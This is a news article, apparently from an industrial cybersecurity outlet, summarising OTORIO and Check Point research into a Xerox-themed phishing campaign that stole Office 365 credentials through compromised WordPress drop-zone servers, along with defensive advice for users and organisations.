OTORIO, Check Point get to the bottom of large scale email phishing campaign

phishing campaign

Industrial cybersecurity company OTORIO recently joined forces with Check Point Research to analyze a large scale email phishing campaign that targeted thousands of global organizations, revealing the campaign’s overall infection chain, infrastructure and how the emails were distributed.

In August, hackers initiated a phishing campaign with emails that masqueraded as Xerox scan notifications, prompting users to open a malicious HTML attachment, according to joint research conducted by Otorio and Check Point. While this infection chain may sound simple, it was able to avoid Microsoft Office 365 Advanced Threat Protection (ATP) filtering and stole over a thousand corporate employees’ credentials, the companies added.

Phishing, credentials theft and business email compromise are the three main techniques that criminals have relied on to help them get around organizations’ defenses, according to data released by OTORIO and Check Point.

Data released by Verizon’s Data Breach Investigation Report, showed that these ‘big three’ are the cause of over two-thirds (67 percent) of successful data breaches around the world. Breaches are composed of a variety of actions, but social attacks such as phishing and pretexting dominate incident data (no confirmation of data disclosure), Verizon said.

Cyber-espionage motivated attacks and incidents involving operational technology (OT) assets are also concerns for these industries, with the mining, quarrying, oil and gas extraction, and utilities segment reporting 194 incidents, out of which 43 instances had confirmed data disclosure.

OTORIO and Check Point research data showed that there was a wide distribution of targeted industries, but there appears to be a keen interest in energy and construction sectors. About 16.7 percent of targets were based in the construction segment, 10.7 percent were from the energy sector, 6.0 percent were from the information technology sector, and about 4.5 percent came from the healthcare market segment, according to the researchers.

The intrusion was made possible by a simple mistake in the attack chain. The attackers behind the phishing campaign exposed the credentials they had stolen to the public Internet, across dozens of drop-zone servers used by the attackers, the joint research report said. With a simple Google search, anyone could have found the password to one of the compromised, stolen email addresses, further exposing it to other opportunistic hackers.

The initial attack started with one of several phishing email templates. The attacker would send an email imitating a Xerox (or Xeros) scan notification with the target’s first name or company title in the subject line. After the victim double-clicked the attached HTML file, the default system browser displayed a blurred image with a preconfigured email within the document.

Throughout the campaign several other phishing page variants were used, but the blurred background image remained the same, the researchers said. After the HTML file was launched, a JavaScript code would then run in the background of the document. The code was responsible for simple password checks, sending the data to the attackers’ drop-zone server, and redirecting the user to a legitimate Office 365 login page.

Throughout the campaign, the code was continuously polished and refined, with the attackers creating a more realistic experience so the victims were less likely to have their suspicions aroused, and more likely to provide their login credentials. Using simple techniques, the attackers were successful in evading detection by several anti-virus vendors, the researchers said.

The campaign utilized both unique infrastructure, and compromised WordPress websites that were used as drop-zone servers by the attackers, the joint research report said. While using a specialized infrastructure, the server would run for roughly two months with dozens of .XYZ domains. These registered domains were used in the phishing attacks.

The researchers discovered dozens of compromised WordPress servers that hosted the malicious PHP page (named “go.php”, “post.php”, “gate.php”, “rent.php” or “rest.php”), and processed all incoming credentials from victims of the phishing attacks, according to the researchers. Attackers usually prefer to use compromised servers instead of their own infrastructure due to existing websites’ reputations. The more widely recognized a reputation is, the chances are higher that the email will not be blocked by security vendors.

Analyzing the different email headers used in the campaign allowed Otorio and CheckPoint researchers  to draw several conclusions regarding the tactics, techniques and procedures (TTPs) used by the attackers, the joint research report said. Some emails were sent from a Linux server hosted on Microsoft’s Azure, others were often sent by using PHP Mailer 6.1.5, while some were delivered using 1&1 email servers.

Attackers used compromised email accounts to distribute spam through high-reputation phishing campaigns because the emails are harder to block. In one specific campaign, a phishing page was found impersonating IONOS by 1&1, a German web hosting company, the researchers pointed out. It is highly likely that the compromised IONOS account credentials were used by the attackers to send the rest of the Office 365 themed spam.

The firms also found that once the users’ information was sent to the drop-zone servers, the data was saved in a publicly visible file that was indexable by Google. This allowed anyone access to the stolen email address credentials with a simple Google search. The public availability of data allowed the researchers to create a breakdown of the victims according to their industry, based on a subset of about 500 stolen credentials.

The researchers also found several correlations to previous phishing activity by comparing the campaign’s TTPs, the joint research report said. Due to the similarities, these activities were likely executed by the same attacker or group of attackers. They also found a phishing email from May 2020 that matched the TTP, which also used the same JavaScript encoding that was used by the campaign in August.

Previously, the script redirected the user to another variant of an Office 365 phishing page that was not entirely encoded within the initial HTML file, the researchers noted.

The Google search engine algorithm naturally indexes the internet, and using its algorithm, it is also capable of indexing the hackers pages where they temporarily store the stolen credentials, according to the joint research report. Attackers will conceal their malicious intentions, bypass security filtering and trick users. To protect from this type of attack, users must be suspicious of any email or communication from a familiar brand or organization that asks to click on a link or open an attached document.

Users must beware of lookalike domains, spelling errors in emails or websites, and unfamiliar email senders, apart from being cautious with files received via email from unknown senders, especially if they prompt for a certain action that one would not usually do. They must also make sure not to reuse passwords between different applications and accounts. Organizations should prevent zero-day attacks with an end-to-end cyber architecture to block deceptive phishing sites and provide alerts on password reuse in real-time.

In December, OTORIO had warned of more industrial ransomware attacks this year, as industrial companies were likely to witness a rise in industrial cybercrime, impacting revenue-generating operations. Ransomware surged 40 percent in 2020 as cyber attackers realize that the industrial sector is willing to pay six digit figures in order to resume revenue generating operations, and the trend is only expected to continue rising.


Share on facebook
Share on google
Share on twitter
Share on linkedin
Share on whatsapp


Join over 5,000 Industrial OT & Cyber professionals

Weekly Newsletter direct to your inbox